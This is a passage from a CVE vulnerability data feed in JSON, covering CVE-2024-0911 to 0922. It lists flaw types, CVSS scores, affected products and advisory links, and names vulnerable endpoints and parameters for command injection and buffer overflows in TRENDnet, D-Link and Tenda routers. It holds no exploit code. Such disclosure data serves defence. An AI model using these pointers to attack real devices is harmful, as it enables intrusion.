: { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-787" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://access.redhat.com/security/cve/CVE-2024-0911", "name" : "https://access.redhat.com/security/cve/CVE-2024-0911", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/security/cve/CVE-2024-0911", "name" : "https://access.redhat.com/security/cve/CVE-2024-0911", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://bugzilla.redhat.com/show_bug.cgi?id=2260399", "name" : "RHBZ#2260399", "refsource" : "", "tags" : [ "Issue Tracking" ] }, { "url" : "https://bugzilla.redhat.com/show_bug.cgi?id=2260399", "name" : "RHBZ#2260399", "refsource" : "", "tags" : [ "Issue Tracking" ] }, { "url" : "https://lists.gnu.org/archive/html/bug-indent/2024-01/msg00000.html", "name" : "https://lists.gnu.org/archive/html/bug-indent/2024-01/msg00000.html", "refsource" : "", "tags" : [ ] }, { "url" : "https://lists.gnu.org/archive/html/bug-indent/2024-01/msg00000.html", "name" : "https://lists.gnu.org/archive/html/bug-indent/2024-01/msg00000.html", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A flaw was found in indent, a program for formatting C code. This issue may allow an attacker to trick a user into processing a specially crafted file to trigger a heap-based buffer overflow, causing the application to crash." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:gnu:indent:2.2.13:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "NONE", "availabilityImpact" : "HIGH", "baseScore" : 5.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.8, "impactScore" : 3.6 } }, "publishedDate" : "2024-02-06T15:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0912", "ASSIGNER" : "productsecurity@jci.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-532" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.cisa.gov/news-events/ics-advisories/icsa-24-135-03", "name" : "https://www.cisa.gov/news-events/ics-advisories/icsa-24-135-03", "refsource" : "", "tags" : [ "Third Party Advisory", "US Government Resource" ] }, { "url" : "https://www.cisa.gov/news-events/ics-advisories/icsa-24-135-03", "name" : "https://www.cisa.gov/news-events/ics-advisories/icsa-24-135-03", "refsource" : "", "tags" : [ "Third Party Advisory", "US Government Resource" ] }, { "url" : "https://www.johnsoncontrols.com/-/media/jci/cyber-solutions/product-security-advisories/2024/jci-psa-2024-04.pdf", "name" : "https://www.johnsoncontrols.com/-/media/jci/cyber-solutions/product-security-advisories/2024/jci-psa-2024-04.pdf", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.johnsoncontrols.com/-/media/jci/cyber-solutions/product-security-advisories/2024/jci-psa-2024-04.pdf", "name" : "https://www.johnsoncontrols.com/-/media/jci/cyber-solutions/product-security-advisories/2024/jci-psa-2024-04.pdf", "refsource" : "", "tags" : [ "Product" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Under certain circumstances the Microsoft® Internet Information Server (IIS) used to host the C•CURE 9000 Web Server will log Microsoft Windows credential details within logs. There is no impact to non-web service interfaces C•CURE 9000 or prior versions" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:h:johnsoncontrols:software_house_c-cure_9000_siteserver:3.00.2:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 4.2, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 0.6, "impactScore" : 3.6 } }, "publishedDate" : "2024-06-06T00:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0913", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/erp/trunk/modules/accounting/includes/functions/transactions.php#L42", "name" : "https://plugins.trac.wordpress.org/browser/erp/trunk/modules/accounting/includes/functions/transactions.php#L42", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/erp/trunk/modules/accounting/includes/functions/transactions.php#L42", "name" : "https://plugins.trac.wordpress.org/browser/erp/trunk/modules/accounting/includes/functions/transactions.php#L42", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/592440ab-60ac-419f-b615-e5617460aea9?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/592440ab-60ac-419f-b615-e5617460aea9?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/592440ab-60ac-419f-b615-e5617460aea9?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/592440ab-60ac-419f-b615-e5617460aea9?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The WP ERP | Complete HR solution with recruitment & job listings | WooCommerce CRM & Accounting plugin for WordPress is vulnerable to time-based SQL Injection via the erp/v1/accounting/v1/transactions/sales REST API endpoint in all versions up to, and including, 1.12.9 due to insufficient escaping on the user supplied status and customer_id parameters and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with accounting manager or admin privileges and higher to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:wedevs:wp_erp:*:*:*:*:free:wordpress:*:*", "versionEndIncluding" : "1.12.9", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-03-29T07:15Z", "lastModifiedDate" : "2025-01-30T15:54Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0914", "ASSIGNER" : "secalert@redhat.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-203" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://access.redhat.com/errata/RHSA-2024:1239", "name" : "RHSA-2024:1239", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:1239", "name" : "RHSA-2024:1239", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:1411", "name" : "RHSA-2024:1411", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:1411", "name" : "RHSA-2024:1411", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:1608", "name" : "RHSA-2024:1608", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:1608", "name" : "RHSA-2024:1608", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:1856", "name" : "RHSA-2024:1856", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:1856", "name" : "RHSA-2024:1856", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:1992", "name" : "RHSA-2024:1992", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:1992", "name" : "RHSA-2024:1992", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/security/cve/CVE-2024-0914", "name" : "https://access.redhat.com/security/cve/CVE-2024-0914", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/security/cve/CVE-2024-0914", "name" : "https://access.redhat.com/security/cve/CVE-2024-0914", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://bugzilla.redhat.com/show_bug.cgi?id=2260407", "name" : "RHBZ#2260407", "refsource" : "", "tags" : [ "Issue Tracking", "Patch" ] }, { "url" : "https://bugzilla.redhat.com/show_bug.cgi?id=2260407", "name" : "RHBZ#2260407", "refsource" : "", "tags" : [ "Issue Tracking", "Patch" ] }, { "url" : "https://people.redhat.com/~hkario/marvin/", "name" : "https://people.redhat.com/~hkario/marvin/", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://people.redhat.com/~hkario/marvin/", "name" : "https://people.redhat.com/~hkario/marvin/", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A timing side-channel vulnerability has been discovered in the opencryptoki package while processing RSA PKCS#1 v1.5 padded ciphertexts. This flaw could potentially enable unauthorized RSA ciphertext decryption or signing, even without access to the corresponding private key." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:opencryptoki_project:opencryptoki:*:*:*:*:*:*:*:*", "versionEndExcluding" : "3.23.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "HIGH", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 5.9, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.2, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-31T05:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0916", "ASSIGNER" : "cna@pentraze.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/uvdesk/core-framework/pull/706", "name" : "https://github.com/uvdesk/core-framework/pull/706", "refsource" : "", "tags" : [ ] }, { "url" : "https://github.com/uvdesk/core-framework/pull/706", "name" : "https://github.com/uvdesk/core-framework/pull/706", "refsource" : "", "tags" : [ ] }, { "url" : "https://pentraze.com/vulnerability-reports/", "name" : "https://pentraze.com/vulnerability-reports/", "refsource" : "", "tags" : [ ] }, { "url" : "https://pentraze.com/vulnerability-reports/", "name" : "https://pentraze.com/vulnerability-reports/", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Unauthenticated file upload allows remote code execution.\nThis issue affects UvDesk Community: from 1.0.0 through 1.1.3.\n\n" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-04-25T23:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0917", "ASSIGNER" : "security@huntr.dev" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://huntr.com/bounties/2d840735-e255-4700-9709-6f7361829119", "name" : "https://huntr.com/bounties/2d840735-e255-4700-9709-6f7361829119", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://huntr.com/bounties/2d840735-e255-4700-9709-6f7361829119", "name" : "https://huntr.com/bounties/2d840735-e255-4700-9709-6f7361829119", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "remote code execution in paddlepaddle/paddle 2.6.0" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:paddlepaddle:paddlepaddle:2.6.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-03-07T09:15Z", "lastModifiedDate" : "2025-01-19T03:31Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0918", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://vuldb.com/?ctiid.252122", "name" : "https://vuldb.com/?ctiid.252122", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252122", "name" : "https://vuldb.com/?ctiid.252122", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252122", "name" : "https://vuldb.com/?id.252122", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252122", "name" : "https://vuldb.com/?id.252122", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://warp-desk-89d.notion.site/TEW-800MB-1f9576ce12234b72b08b9c7f4c7d32a6?pvs=4", "name" : "https://warp-desk-89d.notion.site/TEW-800MB-1f9576ce12234b72b08b9c7f4c7d32a6?pvs=4", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://warp-desk-89d.notion.site/TEW-800MB-1f9576ce12234b72b08b9c7f4c7d32a6?pvs=4", "name" : "https://warp-desk-89d.notion.site/TEW-800MB-1f9576ce12234b72b08b9c7f4c7d32a6?pvs=4", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in TRENDnet TEW-800MB 1.0.1.0 and classified as critical. Affected by this issue is some unknown functionality of the component POST Request Handler. The manipulation of the argument DeviceURL leads to os command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252122 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:trendnet:tew-800mb_firmware:1.0.1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:trendnet:tew-800mb:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.2, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.2, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-26T09:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0919", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://vuldb.com/?ctiid.252123", "name" : "https://vuldb.com/?ctiid.252123", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252123", "name" : "https://vuldb.com/?ctiid.252123", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252123", "name" : "https://vuldb.com/?id.252123", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252123", "name" : "https://vuldb.com/?id.252123", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://warp-desk-89d.notion.site/TEW-815DAP-94a631c20dee4f399268dbcc880f1f4c?pvs=4", "name" : "https://warp-desk-89d.notion.site/TEW-815DAP-94a631c20dee4f399268dbcc880f1f4c?pvs=4", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://warp-desk-89d.notion.site/TEW-815DAP-94a631c20dee4f399268dbcc880f1f4c?pvs=4", "name" : "https://warp-desk-89d.notion.site/TEW-815DAP-94a631c20dee4f399268dbcc880f1f4c?pvs=4", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in TRENDnet TEW-815DAP 1.0.2.0. It has been classified as critical. This affects the function do_setNTP of the component POST Request Handler. The manipulation of the argument NtpDstStart/NtpDstEnd leads to command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252123. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:trendnet:tew-815dap_firmware:1.0.2.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:trendnet:tew-815dap:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.2, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.2, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-26T09:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0920", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://vuldb.com/?ctiid.252124", "name" : "https://vuldb.com/?ctiid.252124", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252124", "name" : "https://vuldb.com/?ctiid.252124", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252124", "name" : "https://vuldb.com/?id.252124", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252124", "name" : "https://vuldb.com/?id.252124", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://warp-desk-89d.notion.site/TEW-822DRE-5289eb95796749c2878843519ab451d8?pvs=4", "name" : "https://warp-desk-89d.notion.site/TEW-822DRE-5289eb95796749c2878843519ab451d8?pvs=4", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://warp-desk-89d.notion.site/TEW-822DRE-5289eb95796749c2878843519ab451d8?pvs=4", "name" : "https://warp-desk-89d.notion.site/TEW-822DRE-5289eb95796749c2878843519ab451d8?pvs=4", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in TRENDnet TEW-822DRE 1.03B02. It has been declared as critical. This vulnerability affects unknown code of the file /admin_ping.htm of the component POST Request Handler. The manipulation of the argument ipv4_ping/ipv6_ping leads to command injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252124. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:trendnet:tew-822dre_firmware:1.03b02:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:trendnet:tew-822dre:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.2, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.2, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-26T09:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0921", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/xiyuanhuaigu/cve/blob/main/rce.md", "name" : "https://github.com/xiyuanhuaigu/cve/blob/main/rce.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://github.com/xiyuanhuaigu/cve/blob/main/rce.md", "name" : "https://github.com/xiyuanhuaigu/cve/blob/main/rce.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252139", "name" : "https://vuldb.com/?ctiid.252139", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252139", "name" : "https://vuldb.com/?ctiid.252139", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252139", "name" : "https://vuldb.com/?id.252139", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252139", "name" : "https://vuldb.com/?id.252139", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability has been found in D-Link DIR-816 A2 1.10CNB04 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /goform/setDeviceSettings of the component Web Interface. The manipulation of the argument statuscheckpppoeuser leads to os command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252139." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dlink:dir-816_a2_firmware:1.10cnb04:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dlink:dir-816_a2:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-26T14:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0922", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-121" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/formQuickIndex.md", "name" : "https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/formQuickIndex.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/formQuickIndex.md", "name" : "https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/formQuickIndex.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252127", "name" : "https://vuldb.com/?ctiid.252127", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252127", "name" : "https://vuldb.com/?ctiid.252127", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252127", "name" : "https://vuldb.com/?id.252127", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252127", "name" : "https://vuldb.com/?id.252127", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as critical was found in Tenda AC10U 15.03.06.49_multi_TDE01. Affected by this vulnerability is the function formQuickIndex. The manipulation of the argument PPPOEPassword leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252127. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:tendacn:ac10u_firmware:15.03.06.49_multi_tde01:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:tendacn:ac10u:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-26T14:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0923", "ASSIGNER" : "cna@vuldb.com" }, 